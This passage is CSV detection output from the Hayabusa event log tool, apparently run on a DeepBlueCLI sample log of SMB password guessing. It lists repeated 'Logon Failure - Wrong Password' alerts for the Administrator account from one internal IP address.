NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q5mMNIdJj0BItrv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb2cVBffdBlwwGQP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p2FbHoSFFdnM4wH7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RAbCN4xKDDlhmrkU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxBwuSDdNZlE2F96 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M3JkwIQF7yV42rOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6QiHHeHeY8yWOiJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rhzpo2bEgpJCB51w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuyPyMMT4wQhLIEz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no5bOZf3SEsrETun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBTHVleOipnyVFIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JNFE2jNifGI7pELk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LgkAKJ57rYqCdbew | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daKQcllU63lW4ypy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBSPSAoEBS7JRYuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94bI5pb8CGjY3QZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1obedLuMFlHlSvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EPn1yJV358YAFALV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qA7N5DMAJqNYkumM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Lk95NYGG5iLBFBw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3DDtXECsK61pIYy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rt8bfBDTV5wYfBO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uTYMgN5kmFpyj7xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmyF6j61wosCE0sg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fd61fJBRizl2AIGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDIFX7lsmGqSGvkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVmto6S25gU2bkwa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7QMbzSuGuzzMK0v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJUynF5bN1Oj0vaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dg4ZtybY5BnPN0nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gRmRV9ct3hor8Muk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QRjaP1mj9FgKsGBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CCzzatQ195mcxQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJPIrtk5GBAhsUlR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 720RHwyXQcxvsJBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GofmHRstuhljMDOL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wQUQ4INktwXwRkaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WHs5hduf7SmUcLK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gdo1txjJXiRLbUDH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JK8jP3ftKQOyutGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdbEjo88dBJRhrKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZCVkXkwhbuSM654 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z2mc9WScfBa88rtO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lee7qYLkXQoz8rRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g1ZKpZuZU1WRoC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4ST7RrHJxAQHHbn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GtW1hBHF97YqvN4N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVKlPytPofO9LQBm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GOkZ9yjvfL51UYXo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAxfxSbRqGO7Dej0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D7XmvDYk6zFLir09 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mWcl6CKdSMxd8edZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SxBQlFZvGBqDdobn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXN94VanwME6q8rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOj7CZ3stJXePY8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXjmqxguFGL3f8cV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHWmdxnRrMbxrdlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ROBnjuyHn4FRugk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zGxuUxasL680O21l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYoM984EzAkUtBoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0e3ATNpzeeAf6Qax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1A0dGhpVy8kgiRP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGgNAKJM5RAt9B5K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c3DpedXujvQpZnjQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BsaSjESaUHbsIxJL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ca4dlxyEco3VOapw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6lJc7DXAOcNZ2G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Olt5mS7na07VDJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCFeQcUMDTs0ev8v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYmH6CQrizoZ1DAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iYtujXkzySwZQFk8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KE9v6wzrebvjvDIl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81gmRFFBHI1s4dqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C8gHWPDjQM8M3tiQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: szj4mJvtFV06CuR2 | IP Addr: 192.168.198.149 | AuthPackage: 